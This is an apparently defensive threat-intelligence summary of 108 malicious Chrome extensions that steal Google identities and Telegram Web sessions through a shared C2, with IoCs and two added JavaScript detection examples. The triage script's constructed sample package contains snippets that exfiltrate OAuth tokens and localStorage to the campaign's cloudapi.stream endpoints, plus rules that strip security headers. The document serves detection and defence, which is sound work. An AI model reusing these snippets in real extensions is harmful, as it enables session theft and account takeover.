108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure

Socket’s Threat Research Team identified 108 malicious Chrome extensions that share a single C2 infrastructure at cloudapi[.]stream and, under five publisher identities, account for about 20k installs. Collectively they exfiltrate Google account identities, Telegram Web sessions and browsing data, and open attacker-specified URLs. The campaign includes OAuth-based identity harvesting, a Telegram Web session stealer (the Telegram Multi-account extension) that exfiltrates sessions every 15 seconds, a shared loadInfo() backdoor, and declarativeNetRequest rules that strip security headers to enable session theft and ad/content injection.

Keypoints

  • 108 malicious Chrome extensions across five publisher names (Yana Project, GameGen, SideGames, Rodeo Games, InterAlt) share a unified backend at cloudapi[.]stream and total ~20k installs.
  • 54 extensions harvest Google account identity via chrome.identity.getAuthToken and POST the profile data to mines[.]cloudapi[.]stream/auth_google, capturing the persistent Google account identifier (the OAuth “sub” claim), which survives password changes.
  • Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) actively exfiltrates Telegram Web sessions every 15 seconds to tg[.]cloudapi[.]stream/save_session.php and supports remote session replacement for full account takeover.
  • 45 extensions contain an identical loadInfo() backdoor that POSTs the extension ID to mines[.]cloudapi[.]stream/user_info on browser startup and opens whatever URL the server returns in infoURL, giving the operator silent remote URL opening on every victim.
  • Five extensions use declarativeNetRequest rules to strip CSP/X-Frame-Options/CORS headers and spoof User-Agent/Origin/Referer to enable session theft and ad/content injection on targeted sites (Telegram, YouTube, TikTok).
  • The infrastructure and monetization (topup[.]cloudapi[.]stream, shared OAuth client IDs from two Google Cloud projects) indicate a Malware-as-a-Service model with centralized operator control and shared OAuth credentials.
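The key points above describe four code-level behaviours (identity harvesting via chrome.identity.getAuthToken, localStorage serialization, a startup check-in that opens a server-supplied URL, and header-stripping declarativeNetRequest rules). The following is an added example of an offline static triage script for an unpacked extension, written for this page; it is not code from Socket’s report or from any of the 108 extensions. The sample package it scans (SAMPLE_PACKAGE) is constructed to mimic the reported behaviours, and the C2 domain is the one the report names; the regex heuristics are this example’s own assumptions about what the code looks like, not a signature published by Socket.

```javascript
// Added example, not code from Socket's report or from any of the 108 extensions:
// offline static triage of an unpacked Chrome extension for the behaviours the
// report describes. SAMPLE_PACKAGE below is constructed for this example.

// Response headers whose removal via declarativeNetRequest modifyHeaders weakens
// the target page's own defences (CSP, framing protection, CORS isolation).
const SECURITY_RESPONSE_HEADERS = new Set([
  "content-security-policy", "content-security-policy-report-only",
  "x-frame-options", "access-control-allow-origin",
  "cross-origin-opener-policy", "cross-origin-embedder-policy",
]);
// Request headers an extension rewrites to impersonate a first-party page.
const SPOOFABLE_REQUEST_HEADERS = new Set(["user-agent", "origin", "referer"]);
// C2 apex domain reported by Socket (defanged on the page as cloudapi[.]stream).
const C2_DOMAIN = "cloudapi.stream";
const C2_URL_RE = new RegExp(
  "https?://([a-z0-9-]+\\.)*" + C2_DOMAIN.replace(/\./g, "\\."), "i");

// Flags modifyHeaders rules that strip security headers or forge request headers.
function findingsForRules(rules) {
  const out = [];
  for (const rule of rules) {
    const action = rule.action || {};
    if (action.type !== "modifyHeaders") continue;
    for (const h of action.responseHeaders || []) {
      if (h.operation === "remove" && SECURITY_RESPONSE_HEADERS.has(h.header.toLowerCase()))
        out.push(`rule ${rule.id}: strips response header ${h.header}`);
    }
    for (const h of action.requestHeaders || []) {
      if (h.operation === "set" && SPOOFABLE_REQUEST_HEADERS.has(h.header.toLowerCase()))
        out.push(`rule ${rule.id}: spoofs request header ${h.header}`);
    }
  }
  return out;
}

// Regex heuristics (this example's assumptions) over a script's source.
function findingsForScript(name, src) {
  const out = [];
  const talksToC2 = C2_URL_RE.test(src);
  if (/chrome\.identity\.getAuthToken\s*\(/.test(src))
    out.push(`${name}: acquires Google OAuth token via chrome.identity.getAuthToken`);
  if (/JSON\.stringify\s*\(\s*(window\.)?localStorage\s*\)/.test(src) || /user_auth/.test(src))
    out.push(`${name}: serialises localStorage / reads Telegram user_auth`);
  if (/setInterval\s*\(/.test(src) && talksToC2)
    out.push(`${name}: periodic beacon to ${C2_DOMAIN}`);
  if (/chrome\.runtime\.onStartup/.test(src) && /chrome\.tabs\.create\s*\(/.test(src) && talksToC2)
    out.push(`${name}: opens server-supplied URL on startup (loadInfo-style backdoor)`);
  if (talksToC2) out.push(`${name}: contacts ${C2_DOMAIN}`);
  return out;
}

// pkg maps file name -> file contents, as read from the unpacked extension directory.
function triageExtension(pkg) {
  const manifest = JSON.parse(pkg["manifest.json"]);
  const findings = [];
  const perms = new Set(manifest.permissions || []);
  if (perms.has("identity") && manifest.oauth2 && manifest.oauth2.client_id) {
    // Google OAuth client IDs are "<project number>-<hash>.apps.googleusercontent.com",
    // so the numeric prefix groups extensions by Google Cloud project.
    findings.push(`manifest: identity permission, OAuth client from project ${manifest.oauth2.client_id.split("-")[0]}`);
  }
  const dnr = manifest.declarative_net_request;
  for (const res of (dnr && dnr.rule_resources) || [])
    findings.push(...findingsForRules(JSON.parse(pkg[res.path] || "[]")));
  for (const [name, src] of Object.entries(pkg))
    if (name.endsWith(".js")) findings.push(...findingsForScript(name, src));
  return findings;
}

// Constructed sample package mimicking the reported behaviours (not a real extension).
const SAMPLE_PACKAGE = {
  "manifest.json": JSON.stringify({
    manifest_version: 3, name: "Demo Multi-account",
    permissions: ["identity", "storage", "declarativeNetRequest", "tabs"],
    oauth2: { client_id: "000000000000-demo.apps.googleusercontent.com", scopes: ["profile"] },
    declarative_net_request: { rule_resources: [{ id: "r", enabled: true, path: "rules.json" }] },
    background: { service_worker: "bg.js" },
  }),
  "rules.json": JSON.stringify([{
    id: 1, priority: 1,
    condition: { urlFilter: "web.telegram.org", resourceTypes: ["main_frame", "sub_frame"] },
    action: { type: "modifyHeaders",
      responseHeaders: [{ header: "Content-Security-Policy", operation: "remove" },
                        { header: "X-Frame-Options", operation: "remove" }],
      requestHeaders: [{ header: "Origin", operation: "set", value: "https://web.telegram.org" }] },
  }]),
  "bg.js": `chrome.runtime.onStartup.addListener(async () => {
    const r = await fetch("https://mines.cloudapi.stream/user_info", { method: "POST", body: chrome.runtime.id });
    const { infoURL } = await r.json();
    if (infoURL) chrome.tabs.create({ url: infoURL });
  });
  chrome.identity.getAuthToken({ interactive: true }, t => fetch("https://mines.cloudapi.stream/auth_google", { method: "POST", body: t }));`,
  "content.js": `setInterval(() => fetch("https://tg.cloudapi.stream/save_session.php",
    { method: "POST", body: JSON.stringify(localStorage) }), 15000);`,
};

console.log(triageExtension(SAMPLE_PACKAGE).join("\n"));
```

Run it with Node against a directory read into the same file-name-to-contents map (for example via fs.readdirSync and fs.readFileSync). The header checks are the most reliable signal: a legitimate extension has very few reasons to remove Content-Security-Policy or X-Frame-Options from another site’s responses, whereas getAuthToken and setInterval also appear in benign code and should be read as prompts for manual review rather than verdicts.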

MITRE Techniques

  • [T1176] Browser Extensions – 108 malicious Chrome extensions, published under five publisher identities, deliver the malicious functionality across users’ browsers (‘108 malicious Chrome extensions operating as a coordinated campaign’)
  • [T1539] Steal Web Session Cookie – The Telegram Multi-account extension serializes the page’s localStorage, extracts the Telegram Web user_auth token and exfiltrates it (‘it immediately calls getSessionDataJson(), which serializes the page’s entire localStorage and extracts the user_auth token’)
  • [T1528] Steal Application Access Token – Extensions acquire a Google OAuth2 bearer token via chrome.identity.getAuthToken and use it to pull the victim’s profile data (‘chrome.identity.getAuthToken({ interactive: true }) acquires a Google OAuth2 Bearer token’)
  • [T1041] Exfiltration Over C2 Channel – Stolen sessions and identity records are POSTed to attacker-controlled endpoints under cloudapi[.]stream (‘POSTs the data to the C2: https://tg[.]cloudapi[.]stream/save_session.php’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Command-and-control and exfiltration run over HTTPS endpoints such as /user_info and /save_session.php (‘POST to /user_info on service worker startup with the extension ID’)
  • [T1027] Obfuscated Files or Information – The backdoor was inserted into already-minified extension code after the fact; the injected function is stylistically inconsistent with the surrounding minified code, which is how the post-hoc insertion was spotted (‘function was stylistically inconsistent with the surrounding minified code’)
  • [T1185] Browser Session Hijacking – The extension can replace a victim’s Telegram Web session on command: it clears localStorage, writes attacker-supplied session data and force-reloads Telegram (‘it clears the victim’s localStorage, overwrites it with threat actor-supplied session data, and force-reloads Telegram.’)

Indicators of Compromise

  • [Email addresses] Contact, author and support addresses observed in bundled files and store listings – kiev3381917@gmail[.]com, nadejdinv@gmail[.]com, and 5 more addresses
  • [Domains/Subdomains] Centralized C2 and asset hosts used by the campaign – cloudapi[.]stream, mines[.]cloudapi[.]stream, and other subdomains (tg., topup., cdn., multiaccount., api., gamewss.)
  • [IP Address] Host for the shared backend (Contabo VPS) – 144[.]126[.]135[.]238
  • [Chrome Extension IDs] Malicious extension identifiers published in the Chrome Web Store – obifanppcpchlehkjipahhphbcbjekfa (Telegram Multi-account), ogogpebnagniggbnkbpjioobomdbmdcj (Text Translation), and 106 more extension IDs
  • [Google Cloud Project IDs] Project numbers that prefix the shared OAuth client IDs, tying the extensions to a single operator – 1096126762051, 170835003632
  • [C2 Endpoints/URLs] Exfiltration and command API endpoints observed in extension code – tg[.]cloudapi[.]stream/save_session.php, mines[.]cloudapi[.]stream/auth_google, and additional endpoints such as /user_info, /count_sessions.php, /get_sessions.php
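The domains, IP and endpoint paths above are the network-side indicators a defender can actually hunt for. The following is an added example, written for this page and not part of Socket’s report, that matches them against proxy logs and also flags the 15-second Telegram session beacon the report describes. The log line format is constructed for the example (real proxies such as Squid or Zscaler use their own layouts, so parseLine would need adjusting); the indicator values and the endpoint-to-behaviour mapping come from the page, and the two-second tolerance on the beacon interval is this example’s assumption.

```javascript
// Added example, not from Socket's report: match the published IoCs against proxy
// logs and flag the 15-second beacon cadence. SAMPLE_LOG is constructed.

const IOC = {
  domains: ["cloudapi.stream"],          // apex and every subdomain (tg., mines., topup., ...)
  ips: ["144.126.135.238"],              // Contabo VPS hosting the shared backend
  // endpoint path -> behaviour the report attributes to it
  paths: {
    "/save_session.php": "Telegram Web session exfiltration",
    "/get_sessions.php": "remote session retrieval (account takeover)",
    "/count_sessions.php": "session inventory",
    "/auth_google": "Google identity harvesting",
    "/user_info": "loadInfo() backdoor check-in",
  },
};

// Constructed format: <ISO time> <client> <method> <host> <path> <status>
function parseLine(line) {
  const m = line.trim().match(/^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$/);
  if (!m) return null;
  return { ts: Date.parse(m[1]), client: m[2], method: m[3],
           host: m[4].toLowerCase(), path: m[5], status: Number(m[6]) };
}

// Exact IP match, or apex/subdomain match; "cloudapi.stream.example.com" must NOT match.
function matchesInfrastructure(host) {
  if (IOC.ips.includes(host)) return true;
  return IOC.domains.some(d => host === d || host.endsWith("." + d));
}

// Returns one hit per matching request, marking repeats from the same client to the
// same endpoint that arrive at the beacon interval (15 s by default).
function scanLogs(text, beaconSeconds = 15, toleranceSeconds = 2) {
  const hits = [];
  const lastSeen = new Map(); // "client|host|path" -> timestamp of previous request
  for (const line of text.split("\n")) {
    const e = parseLine(line);
    if (!e || !matchesInfrastructure(e.host)) continue;
    const key = `${e.client}|${e.host}|${e.path}`;
    const prev = lastSeen.get(key);
    const gap = prev === undefined ? null : (e.ts - prev) / 1000;
    hits.push({
      ...e,
      behaviour: IOC.paths[e.path] || "unknown endpoint on C2 infrastructure",
      beacon: gap !== null && Math.abs(gap - beaconSeconds) <= toleranceSeconds,
    });
    lastSeen.set(key, e.ts);
  }
  return hits;
}

// Constructed sample: one victim beaconing sessions, one harvesting identity,
// one decoy host that merely contains the C2 domain as a label.
const SAMPLE_LOG = `
2025-01-10T09:00:00Z 10.0.0.5 POST mines.cloudapi.stream /user_info 200
2025-01-10T09:00:01Z 10.0.0.5 GET cdn.example.org /lib.js 200
2025-01-10T09:00:10Z 10.0.0.5 POST tg.cloudapi.stream /save_session.php 200
2025-01-10T09:00:25Z 10.0.0.5 POST tg.cloudapi.stream /save_session.php 200
2025-01-10T09:00:40Z 10.0.0.5 POST tg.cloudapi.stream /save_session.php 200
2025-01-10T09:01:00Z 10.0.0.7 POST mines.cloudapi.stream /auth_google 200
2025-01-10T09:01:05Z 10.0.0.7 GET 144.126.135.238 /ping 404
2025-01-10T09:02:00Z 10.0.0.9 GET www.cloudapi.stream.example.com / 200
`;

for (const h of scanLogs(SAMPLE_LOG))
  console.log(`${h.client} -> ${h.host}${h.path}: ${h.behaviour}${h.beacon ? " [beacon]" : ""}`);
```

A client that shows both a /user_info check-in and /save_session.php beacons has the backdoored extension and the Telegram stealer installed; the beacon flag is what separates an active session-theft victim from a one-off install-time check-in, and any request to the IP or an unmapped path is still worth pulling the extension list for, because the report notes further subdomains (topup., multiaccount., gamewss.) whose endpoints are not enumerated here.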


Read more: https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-shared-c2